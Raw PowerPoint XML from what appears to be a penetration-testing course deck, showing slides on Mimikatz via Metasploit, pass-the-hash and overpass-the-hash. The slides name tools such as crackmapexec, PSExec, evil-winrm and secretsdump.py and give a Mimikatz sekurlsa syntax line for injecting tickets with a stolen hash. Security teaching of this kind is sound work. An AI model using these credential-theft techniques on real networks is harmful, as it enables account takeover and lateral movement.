            <a:ext cx="4261260" cy="17590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571500"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6858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dirty="0"/>
              <a:t>Windows has the ability to store plain-text passwords depending on certain settings. Sometimes you get lucky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29847402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52FB8-F241-4593-A4A5-2BBF68C29C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>287</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B30457-20EC-4A0F-BCC2-5B5078D03C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example - Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6439D086-63FB-4A15-92D5-33A71AB44793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="928687" y="1133085"/>
            <a:ext cx="10334625" cy="4748130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4706820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4935A7-3F18-4152-8B0E-7D216384A897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>288</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705736CC-2B09-40D4-889F-3C4805594976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C5185F-FB18-4494-8FB1-ACCD1D94A687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Within a session: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import kiwi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CE9183-AB6C-4D13-8748-35B7BF6D2E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="518159" y="2407621"/>
            <a:ext cx="11155681" cy="2507280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21926107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91F18-5B58-478D-B301-073D929E5364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>289</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Hashes and Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="769505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BD672E-6BBF-4AE0-8B73-F12D7219FC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E0E89A8-A00D-4DBE-9C68-29E7F615BFBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8384B4-0BED-49A3-BA6C-32642480F39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2399840" y="1119794"/>
            <a:ext cx="7412788" cy="5281006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18902145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040B2-4081-4C37-87D2-02C897D0A3DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>290</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44141C63-B50E-4873-A0C3-32C3C42B5118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass the Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B914E10-FC5B-49C7-A43A-63FB2551BDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With NTLM authentication, only need the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can’t be done everywhere and many tools require local admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – checks if hashes/credentials are valid for boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (binary/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) / evil-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>winrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pth-winexe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Gain command execution on target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These require SMB/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secretsdump.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377447076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51E2AB-62BD-48A1-833E-3F028FF55C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>291</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36C2648B-1F1B-4890-B70D-A6460E896F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example - CME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616ADE4F-BFF8-453A-BC78-86EE97BF3BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1123950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Story: Discovered hash for user ‘brent’ – check if the account is a local admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can use credential files and a list of hosts to password spray across a domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BCF569-F9E8-4247-9501-E46F9328161B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="357187" y="2642828"/>
            <a:ext cx="11477625" cy="2832142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA4D9B6-4C2A-4CD4-B065-B9BD3CEED324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630967" y="5151120"/>
            <a:ext cx="8137361"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2866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E1AACF-2F07-498F-A14E-3BD671A36D06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>292</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE41C7F-9295-495E-9A09-76D3D93159D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D43D2E1-9DBF-4458-B477-8243A5911B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Story: A domain admin logged in on client01 and we got his hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DC can only be accessed by domain/enterprise admins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97123ABC-36E6-4BD1-ADA6-9F500924776E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1990725" y="2733120"/>
            <a:ext cx="8210550" cy="2190750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26090639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5DA13-B3C2-4871-AEB0-2E043B092FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>293</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1AEEEEF-EA3E-4FBA-99CA-9F0E2C28C8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overpass the Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7260084-A936-4235-8163-0C00F70AA1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very, very similar to PTH </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to create a TGT for non-NTLM authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (and others) can be used to inject tickets into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa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user:user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domain:domain.fqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /rc4:hash [/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run:prog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739333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8BFE1-AA29-47E8-99C3-613784912F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>294</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68D85475-A905-419A-8CF2-93804DEE523A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Over-pass the hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD7D0D1-1B4F-4552-8C65-69824E580E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
